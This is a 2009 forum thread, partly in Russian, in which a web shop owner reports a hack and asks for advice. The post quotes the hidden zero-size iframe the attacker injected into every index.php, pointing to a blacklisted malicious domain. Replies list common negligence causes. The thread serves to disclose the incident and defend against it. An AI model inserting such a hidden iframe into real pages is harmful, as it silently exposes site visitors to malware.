Just for information to everyone and maybe for you to check your carts!
My shop has had visitors from a hacker during June 2009. The result of their work was discovered by a customer running the AVAST virus scanner. What I have been able to see so far, the hacker was inserting an "iframe" command in all the index.php files:
<!-- ~ --><iframe src="http://livelnternet.net/s/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->"
Checking the access log to my ftp, I can see that the hacker operated from the IP-address: 213.182.197.229, which, according to a search, is located in Riga, Latvia.
The site "http://livelnternet.net", is black-listed by Google, and seems to be hosted in Ukraine.
Except for me the only ones who had my ftp login details were the people at ViArt support (located in Ukraine) and the index.php files had writing rights only for "owner" (-rw-r-r-), which, I suppose, means that they must have been changed by a user logged in to ftp as "owner"
If someone has more experience with such events than I have, I am grateful for tips of how to detect/protect better and also what kind of damage might have been done.
Thanks!
+ Ответить в теме
Показано с 1 по 4 из 4
Тема: Hacked
-
LinkBack
LinkBack URL
About LinkBacks- Bookmark & Share
- Digg this Thread!
- Bookmark in Technorati
-
09.06.2009 12:47 #1devotedГость
Hacked
Последний раз редактировалось devoted; 09.06.2009 в 13:09.
-
31.08.2009 19:01 #2Пользователь
- Регистрация
- 11.04.2009
- Сообщений
- 31
- Загрузки
- 0
- Закачек
- 0
:
0 за это сообщение
0 Всего- Вес репутации
- 17
Re: Hacked
кто-нибудь знает, что за эксплойт был использован? или это просто халатность владельца ресурса, либо соседи?
-
31.08.2009 21:09 #3Сообщество ViArts
- Регистрация
- 01.04.2009
- Сообщений
- 1,562
- Загрузки
- 36
- Закачек
- 2
:
0 за это сообщение
55 Всего- Вес репутации
- 10
Re: Hacked
Как правило, такие случаи имеют место быть и из-за халатности самого владельца (установщика) интернет-магазина (не удалил файл install.php, не переименовал папку admin, не следил за выходом патчей, не "предохранялся" храня пароли на компьютере и т.д.). Наблюдаю такое у 50% работающих интернет-магазинов.
-
01.09.2009 14:13 #4Пользователь
- Регистрация
- 29.05.2009
- Сообщений
- 46
- Загрузки
- 2
- Закачек
- 0
:
0 за это сообщение
0 Всего- Вес репутации
- 18
Re: Hacked
Thanks for information
Ответить с цитированиемИнформация о теме
Пользователи, просматривающие эту тему
Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)
Метки этой темы
Ваши права
- Вы не можете создавать новые темы
- Вы не можете отвечать в темах
- Вы не можете прикреплять вложения
- Вы не можете редактировать свои сообщения
Текущее время: 17:34. Часовой пояс GMT +3.
Социальные закладки